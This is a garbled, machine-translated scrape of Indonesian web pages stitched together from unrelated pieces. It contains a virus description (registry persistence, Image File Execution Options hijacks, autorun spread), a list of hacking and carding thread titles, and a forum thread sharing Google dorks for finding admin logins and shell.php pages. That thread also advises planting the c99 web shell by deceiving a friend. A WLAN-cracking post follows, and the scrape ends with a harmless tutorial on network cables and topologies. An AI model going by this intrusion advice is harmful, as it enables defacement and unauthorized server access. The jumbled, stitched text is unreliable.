probably on purpose to deceive users. To distinguish them, you can see the path or the location of
the executed process. Process virus usually run on System directory as the process / services are
running Windows property usually comes from System32 directory. <br> <br>Changing Registry
<br>This virus adds a startup item on the registry so when he can start running Windows
automatically or to change the settings of Windows to suit his desires. Information about the
registry that the reversal will not be able to easily see that the encrypted condition. <br> <br>What
he changed was the way the value of Userinit items by adding parameters to the parent file. At key
HKEY_CURRENT_ USER \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Windows \
Load item will also be changed to point to a file with the name of the parent Activex.exe. In the
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ will have a
new item with a present. Key HKEY_ LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \
CurrentVersion \ Run \ will have new items as well with the default name and% username%,
username here is the name of the current user at the time. <br> <br>Virus generated from the FFE
results also change the shell extension for the file. Exe, namely by changing the type of information
from the Application to File Folder. Setting the Options folder is also modified to not show the
extension and each fi le with hidden attributes. And that can be active at the safe-mode, he also
changed the value of the item SafeBoot. <br> <br>By using the help of registry Image File
Execution Options, the virus also adds a new item on the section with the name of cmd.exe,
msconfi g.exe, regedit.exe and taskmgr.exe. The point is that every user who accesses the program
with the file name like that, it will be bypassed by Windows and transferred to the main file of the
virus. <br> <br>How Viruses Spread? <br>This virus can spread through the data storage media
such as flash disks. When you plug the flash disk on the infected computer, then the flash disk will
have some new files, like explorer.exe,% virusname%. Exe, and msvbvm60.dll. Also some support
files such as desktop.ini, autorun.inf running so that he could automatically when accessing the
flash disk. <br> <br>Another virus files were stored in a new directory in the flash disk with the
name of the file containing the Recycled Firus.pif and Folder.htt. All of these virus files hidden in
conditions that are not visible. <br> <br>Virus Action <br>To survive, the virus will try to block
any program that he did not want such tools or programs, including antivirus PCMAV. Just as the
changed registry data, data about what programs are blocked by it is also present in the body in a
state encrypted. <br> <br>So, when the virus was stay in memory, he will monitor each program
accessed by the user, ie by reading the file name and window caption. Some of the files are tested
for antiviral dibloknya is nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe,
nvcoas.exe, avp32.exe, and many others. Including some or installer setup program can not run on
the infected computer. <br> <br>Prevention and Control <br>PC Media Antivirus RC19 was able
to clean infected computer completely and accurately 100% of each virus that is made by using
Firus Fast Generator. To avoid action by the virus to block PCMAV, please rename the file first
instance PCMAV PCMAV-CLN.EXE be MERDEKA.EXE. <br> <br>Laptop Sale at the moment
Russia&#39;s horrible Ended (Video!) <br> <br> <br> <br>You might also like: <br>
<br>Clubbing photos Niken Anjani! <br>The car transformed into an aquarium fish! <br>List of
highest-paid player in the Football League Indonesia! <br>Projecting Presenter KPI Properties
Disallow Homosexual! LinkWithin <br>
Bahasa yang tersedia untuk penerjemahan:

Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania
Rusia
Serb
Sloven
Slowakia
Spanyol
Suomi
Swahili
Swensk Thai
Turki
Ukraina
Vietnam
Wales
Yiddi
Yunani

©2010 Google - M
Injektor (kalo ada yang membutuhkan)
rapidshare hack!!
Lumpuhkan Komputer satu LAN dengan Ettercap DOS Attack
Cara Hack password Deep Freeeze 6.0
Melemahkan AP Dengan AP
Melumpuhkan AP dengan Void11
Panduan Download MP3 Lagu Indonesia @ Google & Multiply
Hacking Cpanel Dengan C99
Pembobolan Ratusan bahkan Ribuan Router ADSL
Anatomy Hacking
Journal Password Online, Gunakan dengan bijak, kasian yang punya nya
curi data flash
hacking friendster
situs hacker
download youtube tampa progam
rapidshare premium
Mengecoh Org Membuka File
How to Hack Yahoo Passwords
beberapa contoh shell inject++
Hidden Tools Xp
Google Aneh
Film Rahasia di XP!!!
Bkin logo google
Teknik Serangan DOS
DEFACeR
source code php injector
Fake Login FS
(ask) ngehack Password game OL
[ASK] cara non aktivin timer/billing
{ASK} IP Friendster
Show off ARENA
Tips Internetan GRATIS via XL
HACK hati temen km (tentang siapa yg dia suka sebenernya)
Tingkatan Masyarakat Hacker
Cara Hacker curi data Kartu Kredit
aku mo share sdikit ilmu ni
Ultimate Hacking Experience (2008)
<ask> ad yang bisa hack game OL
Intip Private Photo dan Private Profile pada FRIENDSTER
yang DOYAN CRACK CC MASUK SINI
cara sederhana dan mudah hack paypal
Teknik Carding Untuk Para Pemula
Digishop
Mendeteksi Login Ssh Yang Menggunakan Magic_passwd
DEFACE with PHP Injection
Membuat injector berformat JPG
Driver NVIDIA
Cara Simple Bikin VIRUS
Mainan DDOS
pendatang baru di sub HACKING
Flood YM Sederhana <muuph hanya sekedar berbagi aja>
Ayo Belajar Bersama (Malas Ngasih Judul)
Deface with PHP Injections
Windows XP MultiUser Remote Desktop
Cara Simple Colong Swf
Ngobrol Teroosssss Sampe Doweeerrr
Utak Atik HaPe NOKIA
utak atik regedit windows XP
Penyelundup file
Iseng YM ria pake OS Linux
Memanfaatkan Kelemahan Billing Explorer
Teknik Membobol Keamanan Warnet Windows
Mempercepat performa Vista basic
Jadi Hacker Tidak Perlu Pintar
Intip Private Photo dan Private Profile pada FRIENDSTER NEW!!!! live vdeo
Wireless Hacking Live - FBI version ISO
cari tahu IP addr dr ID YM,bisa gak ???
Iseng Yuukkzzz
Panen password di LAN dan alternatif proteksinya
Dari guest menjadi administrator....
Kecil isa bikin Modyiar
Biar kagak ketangkep kalo mau iseng2...
Nongkrong Di Localhost
faster mail bomber + anonymous
Take Over Computer Lawan
ganti admin pass pada pc
Hacking Windows Registry
cara ampuh ngilangin DeepFreeze v6... klo g tau password
Miss Indonesia
[Sulap] Windows XP "Bajakan" kamu jadi 100% Asli
[ISENG] - Ngerjain Orang Lain Pakai Notepad
VBS Virus Maker
Merubah WINDOWS BAJAKAN JADI GENUINE TANPA SOFTWARE APAPUN !!!!!
(ISENG)mo ngerjain tmn? *tukang jahil hrs masuk thread ini*
[SHARE] Bom SMS ........ (tested on XL)
Hack Premium Akun Download Unlimited
Hack Akun Megashare Premium
Hack Premium Akun Vbulletin
Hack Akun divxcrawler
xander international
buat yg belom punya pacar
Cara merusak profil fs orang
crackershit.co.cc
Cara Hack friendster neeh !
[ASK] cara ngehack forum ini.....
berbagi: kasperky key yang selalu terkini dan tidak blacklist
Deface web menggunakan SQL Injection pada X-Ice System V-1
Ada yang bisa gak..??
Tips cara membuat microsoft office 2007 Genuine
[REQ] Get Chip
Hack wireless mudah n cepat alias instan
hack FS
Tutorial Hacking
mohon bantuan
decrypt-encrypt
.com.my
facebook freezer
Hack Billing Indo
Kumpulan eBook Hack
[req]account premium rap*dsh*re n mega*pload
(ask)bypass hackshield PB IndoForum> Hobby> Computer Stuff> Security & Hacking> [ASK]
bntar Aza, Plss

-------------------------------------------------- ------------------------------
PDAView Full Version: [ASK] bntar Aza, Plss

-------------------------------------------------- ------------------------------

Gloria04-11-2006, 07:45 pm
KK, How I Teach Please Gunain Google Hacking / heh badminton Search the Web Yg Bisa PHP
Injection / sob Plzz ... GRP + +

-------------------------------------------------- ------------------------------

itlust04-11-2006, 08:13 pm
site search mo ye yg kayak gimana ni used?

-------------------------------------------------- ------------------------------

D-Cracker05-11-2006, 06:01 PM
May mean Doi, PHP Web Nyari Bs In reply Dgn Deface PHP Injection /! Ehmm .... Situs Bokep
Klo Ada Yg PHP No /? Klo Ada, Deface That Aza / heh

-------------------------------------------------- ------------------------------

alcapone05-11-2006, 06:03 PM
elo girls deface tawarin Bokep / swt / swt / swt / swt

-------------------------------------------------- ------------------------------

D-Cracker05-11-2006, 06:52 pm
Yes, Boy From His mind Dech Tree / swt BKN B'Gitu Mksd Gw / Gw Mksd omg, Mustinya We
Nge Hacking, Cracking, Defacing Web Porno, aim Let Yg Lord of Web Porn That kesel / heh I'll
Not Want Lage Doi Bikin Web Porno, Now pornographic Web Khan World Jd Reduced / Great
Khan's no1 / heh

-------------------------------------------------- ------------------------------

meyerzz05-11-2006, 10:51 PM
yes ..
gw also want he asked ..
nyarinya gimana tuh?

-------------------------------------------------- ------------------------------
alcapone05-11-2006, 11:01 PM
Web kalo Bokep in the world diminished, many would reply sadly / gg / gg / gg
@ D-Cracker
PM gue bales woy zzzzzzzzz

-------------------------------------------------- ------------------------------

meyerzz05-11-2006, 11:25 PM
not a web itunya / omg ...
which it .. google
wah ..
dangers of the world euy /!

-------------------------------------------------- ------------------------------

itlust05-11-2006, 11:36 AM
google hacking klo usually okay allinurl: admin / login.php

k so we brought a directory website imaginable and there login.phpnya admin XD

-------------------------------------------------- ------------------------------

meyerzz06-11-2006, 02:18 pm
hmm ..
but can klo nyari dikasi / shell.php?

-------------------------------------------------- ------------------------------

itlust06-11-2006, 03:55 PM
allinurl: / shell.php

-------------------------------------------------- ------------------------------

meyerzz06-11-2006, 04:14 PM
first test .. klo will be GRP ..

-------------------------------------------------- ------------------------------

D-Cracker06-11-2006, 07:30 PM
@ D-Cracker
PM gue bales woy zzzzzzzzz
Kpn Lu AM /? Klo PM Gw's New Yg, must Lg Aza His POP UP /? PM's Lu Not There Dech

google hacking klo usually okay allinurl: admin / login.php


k so we brought a directory website imaginable and there login.phpnya admin XD
Google Hack TP Bye No Can, Because It's His opponent Google Hack / omg called Google, Google
Is Ric Forgot Lage / swt Google Drocks Yes /?

/ shell.php?
According Gw, Klo His Word Search Kek Gini hard Msh 8X

allinurl: / shell.php
No Nge Help / sob

-------------------------------------------------- ------------------------------

itlust06-11-2006, 07:51 pm
@ top
He dies a nemuin nanya gimana cara yg / shell.php ...
web search for bsa guns in deface what it should own coba2 dunk XD

google hack google instead of just kyk dorkling? (ato Dorking huh?) =))

-------------------------------------------------- ------------------------------

alcapone06-11-2006, 07:55 PM
@ the passer-mudeng hackers
ksh tau caranya can deface the website, aka cartoon hentai bokep wrote in a foreign country /? / gg /
gg / gg

-------------------------------------------------- ------------------------------

D-Cracker06-11-2006, 07:56 PM
google hack google instead of just kyk dorkling? (ato Dorking ya?)
Yes, Gw Tau Is Not His opponent Google Hack /! What name is forgotten Lage Gw, Serious /!

Yg Clearly Google Hack Any Make, It's Teasing Yg point "Mao Nge Hack, Mao Nge Hack?" Tp
Make Bhs.Inggris
Password Cthnya Gw Nyari Make A Web GHack, So Pas gw Click "Google It blah ...."

He dies a nemuin nanya gimana cara yg / shell.php ...


web search for bsa guns in deface what it should own coba2 dunk XD
Kagak Tau, Gw Dizziness Nich / heh How Fast Considered Inappropriate <- Tanya knp /? Keep
Nyari, Ampe Mampus

-------------------------------------------------- ------------------------------

D-Cracker06-11-2006, 07:58 pm
@ the passer-mudeng hackers
ksh tau caranya can deface the website, aka cartoon hentai bokep yg abroad
Gw No Mudeng Hacker, Cm His Tau Basic doank / heh B'Coz Udh Kt Org Yg Sene At Chase Dr.
"Deface It Cm edit the index.html or index.php Gotta We Doing Proud, It Sich Starter Jg Bs"

Turn Again To Issue:


Depending on his Web Type What /? ASP, PHP, Etc.

-------------------------------------------------- ------------------------------

alcapone06-11-2006, 07:59 PM
PHP / E14, ajarin dunk / gg / gg
the HTTP reply, how his way deface nge / ...

-------------------------------------------------- ------------------------------
D-Cracker06-11-2006, 08:02 pm
the HTTP reply <- HTTP, wakakakakk ..... : laughing: Wakakakk ..... Mao Ngelawak Mass. / heh
Klo The **** Read This, Can Salto Kale 780 Degrees / swt

-------------------------------------------------- ------------------------------

alcapone06-11-2006, 08:08 PM
ohh no, so the HTTP nda isa to, just know I / gg / gg / gg
loe mean **** right Th0r / E14

-------------------------------------------------- ------------------------------

D-Cracker06-11-2006, 08:17 PM
ohh no, so the HTTP nda isa to, just know I
Wkakakak .... / heh Gw Jd Keseleg Nich / Hr Each sob Period Open Internet, Tp No Tau HTTP
That Is /?

-------------------------------------------------- ------------------------------

itlust06-11-2006, 09:06 PM
Yes, Gw Tau Is Not His opponent Google Hack /! What name is forgotten Lage Gw, Serious /!

Yg Clearly Google Hack Any Make, It's Teasing Yg point "Mao Nge Hack, Mao Nge Hack?" Tp
Make Bhs.Inggris
Password Cthnya Gw Nyari Make A Web GHack, So Pas gw Click "Google It blah ...."

Kagak Tau, Gw Dizziness Nich / heh How Fast Considered Inappropriate <- Tanya knp /? Keep
Nyari, Ampe Mampus
Setau g google hack google ma kyk dorkling same ... Setau g masi blon google there are other de: D

ad slogans dibawa2 jng om =))

o iya klo jng png double post reply disatuin aj 2 org dlm 1 post:)

-------------------------------------------------- ------------------------------

xaxer07-11-2006, 12:47 AM
kalo emang have knowledge bagi2 dunk ..... jgn disimpen sendiri2: D
= HTTP protocol for the internet, kalo gak salah acronym Hyper Text Transfer Protocol, so that the
protocol for file transfer, kira2 so, mudah2an gak salah, kalo salah tolong dimaapin n corrected: D

kalo mau pake nyari on google allinurl still think d, g kemaren2 still want to try nampil kok

-------------------------------------------------- ------------------------------

D-Cracker08-11-2006, 05:39 PM
Yes, Lovable Can /! hold such a link would need behind Web / shell.php khan /? Emang Sich Can,
Tp Not Easy At All Inject / sob

-------------------------------------------------- ------------------------------
meyerzz08-11-2006, 05:47 PM
yes /!
ga bisa / sob
ga jadi deh grpnya / heh

-------------------------------------------------- ------------------------------

D-Cracker08-11-2006, 05:50 pm
Bknnya No Can, Can Can Sich / heh Yes We Go Web Links One example: www.xxx.com /
shell.php <--- Shell.php this, perhaps the contents page, klo gw sich nemuin pages about oysters /
heh aka Qta nge dolo must inject mass, lu upload dolo code / scriptnya at geocities / where the
hand-over loe, abis ever lived ikutin yg wa langkah2x Kase / no1

-------------------------------------------------- ------------------------------

meyerzz08-11-2006, 05:55 PM
Where langkah2nya mas /?
the thread where?

-------------------------------------------------- ------------------------------

D-Cracker08-11-2006, 06:03 PM
The Security Thread N Hacking, "Little About PHP Injection" Tp There bbrp Error Writing / SHG
heh what Nulis Pengen Gw yg gw mskd, MLH MJD smilies / heh
Or How Short: PHP Injection (http://codeattack.wordpress.com/2006/07/20/tips-php-injection/)

-------------------------------------------------- ------------------------------

Gloria08-11-2006, 06:54 PM
Um ... Om Mao nanya / heh Klo We Scriptnya Tau Dah, Khan Hrs To Go On the Upload Web
Hosting Gratisan / heh Wa's Nich Web Hosting Accounts At Gratisan geocities / cute_verial / no1
Abis That Aplod Scriptnya How /?

-------------------------------------------------- ------------------------------

kodoks08-11-2006, 07:07 pm
Easy, Try Loe Download c99sh Upload Go Webserver (must support PHP 4 + +).
How? easy aja ... temen aja loe boongin (temen dolo aje ...) rename aja kalo asked bokep.php hell?
told you it could ngambil image of Se-WebsiteWebsite Bokep indo ... but temen loe must not
understand PHP ... kalo gak bakal understand ketp ma!

-------------------------------------------------- ------------------------------

D-Cracker10-11-2006, 05:05 PM
Upload Scriptnya Jgn At Geocities / heh The aza 1111mb.com support php version 4 / no1

-------------------------------------------------- ------------------------------

vBulletin ® v3.8.4, Copyright © 2000-2010, Jelsoft Enterprises Ltd..

Sumbangkan terjemahan yang lebih baikHack WLAN


-------------------------------------------------- ------------------------------

Hack WLAN

Create a linux pake understand ....!!


all tools for hacking wifi in backtrak udah 2.
download the file here ISOnya
http://mirror. switch.ch / ftp/mirror/backtrack/bt2final.iso
www.remote-exploit. org / backtrack_download.html

for the tutorial:


http://rapidshare. com / files / 36171487 / WEPCrack-newhackEdition. zip.html

Makace!

http://www.4shared. com / files / 15757096 / bffb3441 / net_stumbler_ installer_ 0_4_0.html

http://www.4shared. com / files / 15756908 / 3eecfee5 / Airscanner_ Wifi_Sniffer_ Pc-Ppc.html

Tools used yg .. netstembler or wifi hopper, .. network


detector ....

simple banget kok, .. but should pake Orinoco card Web Gambar Maps Buku Terjemahan Blog
Gmail selengkapnya ▼Direktori

Kalender

Foto

Documents

Site

Grup
Bantuan

Penerjemahan

Penelusuran Diterjemahkan

Translator Toolkit

Alat dan Sumber Daya

Menerjemahkan teks, laman web, dan dokumen

Masukkan teks atau URL laman web, atau unggah dokumen.


Masukkan teks atau URL laman web, atau unggah dokumen.
sekalian belajar nih tentang jaringan, dan biar topik ini gak sepi, mending alis nulis aja deh tentang
jaringan, kalo mau tanya, posting aja, kalo bisa dijawab syukur kalo gak bisa pasti ada teman lain
yang ngejawab

sebenarnya gak tau mulai dari mana nih ngomongnya, tapi karena thread ini dimulail dengan kabel,
kita bahs dikit tentang kabel ya..maap kalo membosankan bagi yang udah tau, kan lumayan, bagi-
bagi ilmu bagi yang belum tau

kabel
=====
bicara tentang jaringan, pasti gak lepas dari yang namanya kabel, walaupun sekarang udah
jamannya wireless, tapi kabel tetap akan menjadi bahan pelajaran yang gak mungkin dilupakan oleh
network equipment, toh wireless sekarang juga masih menganut ajaran (emang silat?) wired,
misalnya optik dll lah

prinsip kerjanya sih ringan, kabel ngubungin satu sisi dengan sisi yang lain dengan terminator di
masing2 ujung, tapi hubungan ini tidak menyebabkan hubungan tertutup antar 2 sisi saja, bisa di
setting menjadi 2 hubungan terbuka dengan sisi yang lain

sekarang kan jaman udah canggih, jadi topologi kabel juga berkembang, mulai dari jamannya
teknologi telegraf yang make gelombang radio hingga jamannya serat optik dan laser.

tipe-tipe kabel nih


===================
Setiap jenis kabel mempunyai kemampuan dan spesifikasinya yang berbeda, oleh karena itu
dibuatlah pengenalan tipe kabel.
Ada dua jenis kabel yang dikenal secara umum, yaitu:
1. twisted pair: UTP(unshielded twisted pair) dan STP (shielded twisted pair) 2. coaxial cable.

Kategori untuk twisted pair yaitu:

kabel:Type CAT 1
tipe :UTP
fitur:analog(biasanya digunakan di perangkat telephone pada umumnya dan pada jalur ISDN –
integrated service digital networks-. Juga untuk menghubungkan modem dengan line telepon).

kabel:Type CAT 2
tipe :UTP
fitur:up to 1 Mbits(sering digunakan pada topologi token ring)

kabel:Type CAT 3
tipe :UTP / STP
fitur:16 Mbits data transfer(sering digunakan pada topologi token ring atau
10BaseT)

kabel:Type CAT 4
tipe :UTP, STP
fitur:20 Mbits data transfer(biasanya digunakan pada topologi token ring)

kabel:Type CAT 5
tipe :UTP, STP
fitur:up to 100 MH. 100 Mbits data transfer / 22 db
kabel:Type CAT 5enhanced
tipe :UTP, STP
fitur:up to 100 MHz.1 Gigabit Ethernet up to 100 meters - 4 copper
pairs(kedua jenis CAT5 sering digunakan pada topologi token ring 16Mbps, Ethernet 10Mbps atau
pada FastEthernet 100Mbps)

kabel:Type CAT 6
tipe :UTP, STP
fitur:up to 155 MHz or 250 MHz. 2,5 Gigabit Ethernet up to 100 meters or 10
Gbit/s up to 25 meters . 20,2 db (Gigabit Ethernet)

kabel:Type CAT 7
tipe :UTP, STP
fitur:up to 200 MHz or 700 Mhz Giga-Ethernet / 20.8 db(Gigabit Ethernet)

ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php

Pemberian kategori 1/2/3/4/5/6 merupakan kategori spesifikasi untuk masing-masing kabel tembaga
dan juga untuk jack. Masing-masing merupakan seri revisi atas kualitas kabel, kualitas
pembungkusan kabel (isolator) dan juga untuk kualitas “belitan” (twist) masing-masing pasang
kabel. Selain itu juga untuk menentukan besaran frekuensi yang bisa lewat pada sarana kabel
tersebut, dan juga kualitas isolator sehingga bisa mengurangi efek induksi antar kabel (noise bisa
ditekan sedemikian rupa).------> fisika banget tuh

Perlu diingat juga (ingak..ingak), spesifikasi antara CAT5 dan CAT5 enchanced mempunyai standar
industri yang sama, namun pada CAT5e sudah dilengkapi dengan insulator untuk mengurangi efek
induksi atau electromagnetic interference. Kabel CAT5e bisa digunakan untuk menghubungkan
network hingga
kecepatan 1Gbps.(buset..1 giga bokkkkkk)

Sedangkan untuk coaxial cable, dikenal dua jenis, yaitu

1. thick coaxial cable (mempunyai diameter lumayan besar)


Kabel coaxial jenis ini dispesifikasikan berdasarkan standar IEEE 802.3 10BASE5, dimana kabel
ini mempunyai diameter rata-rata 12mm, dan biasanya diberi warna kuning; kabel jenis ini biasa
disebut sebagai standard ethernet atau thick Ethernet, atau hanya disingkat ThickNet, atau bahkan
cuman disebut
sebagai yellow cable.

Kabel Coaxial ini (RG-6) jika digunakan dalam jaringan mempunyai spesifikasi dan aturan sebagai
berikut:
* Setiap ujung harus diterminasi dengan terminator 50-ohm (dianjurkan menggunakan terminator
yang sudah dirakit, bukan menggunakan satu buah resistor 50-ohm 1 watt, sebab resistor
mempunyai disipasi tegangan yang lumayan lebar, kalo gak ahli, bisa gawat nih).
* Maksimum 3 segment dengan peralatan terhubung (attached devices) atau berupa populated
segments.
* Setiap kartu jaringan mempunyai pemancar tambahan (external transceiver).
* Setiap segment maksimum berisi 100 perangkat jaringan, termasuk dalam hal ini repeaters.
* Maksimum panjang kabel per segment adalah 1.640 feet (atau sekitar 500 meter).
* Maksimum jarak antar segment adalah 4.920 feet (atau sekitar 1500 meter).
* Setiap segment harus diberi ground.
* Jarang maksimum antara tap atau pencabang dari kabel utama ke perangkat (device) adalah 16
feet(sekitar 5 meter).
* Jaral minimum antar tap adalah 8 feet (sekitar 2,5 meter).

2. Thin coaxial cable (Kabel Coaxial “Kurus”)


Kabel coaxial jenis ini banyak dipergunakan di kalangan radio amatir, terutama untuk transceiver
yang tidak memerlukan output daya yang besar. Untuk digunakan sebagai perangkat jaringan, kabel
coaxial jenis ini harus memenuhi standar IEEE 802.3 10BASE2, dimana diameter rata-rata berkisar
5mm dan
biasanya berwarna hitam atau warna gelap lainnya. Setiap perangkat (device) dihubungkan dengan
BNC T-connector. Kabel jenis ini juga dikenal sebagai thin Ethernet atau ThinNet.
Kabel coaxial jenis ini, misalnya jenis RG-58 A/U atau C/U, jika diimplementasikan dengan
TConnector dan terminator dalam sebuah jaringan, harus mengikuti aturan sebagai berikut:
* Setiap ujung kabel diberi terminator 50-ohm.
* Panjang maksimal kabel adalah 1,000 feet (185 meter) per segment.
* Setiap segment maksimum terkoneksi sebanyak 30 perangkat jaringan (devices)
* Kartu jaringan cukup menggunakan transceiver yang onboard, tidak perlu tambahan
transceiver,kecuali untuk repeater.
* Maksimum ada 3 segment terhubung satu sama lain (populated segment).
* Setiap segment sebaiknya dilengkapi dengan satu ground.
* Panjang minimum antar T-Connector adalah 1,5 feet (0.5 meter).
* Maksimum panjang kabel dalam satu segment adalah 1,818 feet (555 meter).
* Setiap segment maksimum mempunyai 30 perangkat terkoneksi.

demikian sekilas tentang kabel dan tipe2nya


masih banyak dan dalam kalo bicara tentang kabel sebenarnya, tapi berhubung tangan udah pegal,
dan leher udah kaku, kita sambung besok atau lusa ya

ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php
dengan modal les bahasa inggris, hhe..

ntar kita akan ngebahas topologi jaringan yang merupakan "program kerja" dari kabel itu sendiri

semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-12-2006, 01:31 PM #3
jurnalis jh
Imum Mukim
Join Date: Nov 2006
Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

topologi jaringan
=================

masuk bab selanjutnya nih, hhe (sok jago)

penentuan topologi jaringan akan menentukan jenis kabel yang akan kita pake, dan juga sebaliknya,
ketersediaan kabel dan gocek yangkita punya, menjadi pikiran dong untuk membangun sebuah
jaringan (untuk kedepannya kita sebut network, biar keren)

sebenarnya sih banyak banget topologi network itu, tapi yang sering kita dengar itu cuma 3 doang,
dan yang banyak itu juga berbasis yang 3 ini, cuma kadang2 pelaku network memodifikasi sedikit
tergantung kondisi, misalkan areanya, panjang kabelnya, dll

siapa aja mereka bertiga itu:

1. ring topology
Topologi ini manfaatin kurva tertutup, artinya informasi dan data serta traffic disalurkan sedemikian
rupa sehingga ke masing-masing node. Umumnya fasilitas ini memanfaatkan fiber optic sebagai
sarananya
(walaupun ada juga yang menggunakan twisted pair).
(bahasannya ada di atas)

2. linear bus topology


Topologi linear bus merupakan topologi yang banyak dipergunakan pada masa penggunaan kabel
Coaxial menjamur. Dengan menggunakan T-Connector (dengan terminator 50ohm pada ujung
network), maka komputer atau perangkat jaringan lainnya bisa dengan mudah dihubungkan satu
sama lain.
Kesulitan utama dari penggunaan kabel coaxial adalah sulit untuk mengukur apakah kabel coaxial
yang dipergunakan benar-benar matching atau tidak. Karena kalau tidak bener-bener diukur secara
tepat akan merusak NIC (network interface card) yang dipergunakan dan kinerja jaringan menjadi
terhambat, tidak mencapai kemampuan maksimalnya. Topologi ini juga sering digunakan pada
jaringan dengan basis fiber optic (yang kemudian digabungkan dengan topologi star untuk
menghubungkan
dengan client atau node).

3. star topology
Topologi jaringan ini banyak digunakan di berbagai tempat, karena kemudahan untuk menambah,
mengurangi atau mendeteksi kerusakan jaringan yang ada. Selain itu, permasalahan panjang kabel
yang harus sesuai (matching) juga tidak menjadi suatu yang penting lagi. Pokoknya asal ada hub
(yang masih beres tentunya) maka bisa terhubunglah beberapa komputer dan sumber daya jaringan
secara mudah.
Dengan berbekal crimtool, kabel UTP (biasanya CAT5) dan connector, seseorang dengan mudah
membuat sebuah sistem jaringan. Tentu ada beberapa kerugian karena panjang kabel (loss effect)
maupun karena hukum konduksi, namun hampir bisa dikatakan semua itu bisa diabaikan.

Paparan ketiga topologi di atas hanya sebagai sebuah pengantar. Intinya bahwa sebuah jaringan bisa
jadi
merupakan kombinasi dari dua atau tiga topologi di atas. Misalnya saja ada yang menyebut tree
topology,
dimana sebenarnya topologi ini merupakan gabungan atau kombinasi dari ketiga topologi yang ada.

itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-12-2006, 01:41 PM #4
ihan_sunrise
Contributor

Join Date: Apr 2006


Location: Negeri Syariat
Posts: 2,210
Thanks: 0
Thanked 25 Times in 10 Posts

--------------------------------------------------------------------------------

up load gambar harus dari photobucket dulu lis.....setelah itu baru masukin kemari...kayaknya dulu
dah ad penjelasannya, cuman ihan lupa di thread apa
__________________
cinta telah merengkuh ku
dan aku lega bisa memeluknya
rindu telah menarik ku
dan aku senang karena ia tak membiar kan ku
Ihan Sunrise
http://ihansunrise.blogspot.com/

ihan_sunrise
View Public Profile
Send a private message to ihan_sunrise
Visit ihan_sunrise's homepage!
Find More Posts by ihan_sunrise

12-12-2006, 05:09 PM #5
baiquni
Peutua

Join Date: Mar 2006


Location: banda aceh
Posts: 571
Thanks: 0
Thanked 10 Times in 5 Posts

--------------------------------------------------------------------------------

makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.

Alis... gi ngapain ?
__________________
Satu hati... Satu rasa... SEMESTINYA !!!

My Blogs: http://www.baiquni.net/
My Wordpress: http://baiquni.wordpress.com/
My Friendster: http://www.friendster.com/mbaiquni
My Bussiness: http://www.ipulsa.net/

baiquni
View Public Profile
Send a private message to baiquni
Visit baiquni's homepage!
Find More Posts by baiquni

12-15-2006, 12:58 PM #6
jurnalis jh
Imum Mukim
Join Date: Nov 2006
Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by baiquni
makasih ya alis... ilmu yang alis share semoga bermanfaat bagi kita semua amien.

Alis... gi ngapain ?

amin...alis kira gak ada yang respon, hhe..


ntar kita mulai lagi dengan LAN...tapi sekarang lagi searching bahan2 TA dulu, besok ya di
sambung lagi
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-15-2006, 01:32 PM #7
sHinOsuke
Super Moderator

Join Date: Feb 2006


Posts: 1,363
Thanks: 16
Thanked 47 Times in 14 Posts

--------------------------------------------------------------------------------

eh kalau mau buat WLAN apa-apa aja ya perangkat yang di butuhkan


__________________
Fadli Blogs Free MySQL Database Article

sHinOsuke
View Public Profile
Send a private message to sHinOsuke
Find More Posts by sHinOsuke

12-15-2006, 03:33 PM #8
aloysurf
TUKANG FOTO

Join Date: Nov 2006


Location: On The Beach
Posts: 1,942
Thanks: 8
Thanked 4 Times in 4 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
itu sekilas tentang topologi jaringan, sebenarnya lebih enak kalo ada gambarnya, tapi alis masih
bingung, gimana ya cara upload gambar di postingan?

Coba lihat di sini http://acehforum.or.id/showthread.php?t=2740


Semoga berkenan...

Salam

aloysurf
View Public Profile
Send a private message to aloysurf
Visit aloysurf's homepage!
Find More Posts by aloysurf

12-17-2006, 11:22 AM #9
muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
amin...alis kira gak ada yang respon, hhe..
ntar kita mulai lagi dengan LAN...tapi sekarang lagi searching bahan2 TA dulu, besok ya di
sambung lagi
ow..mantap bang lagi sibuk TA malah sempat bagi2 ilmu mantap..oya untuk cara pasang kabel utp
nya ditambah dikit donk bang,,,biar mantap...sekalian cara buat pc router...dalam bahasa indonesia
ya bang...sep...mantap buat bang alis..

muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz

12-18-2006, 05:29 AM #10


acheh
Geuchik

Join Date: Feb 2006


Location: Bumi Allah
Posts: 996
Thanks: 31
Thanked 14 Times in 4 Posts

--------------------------------------------------------------------------------

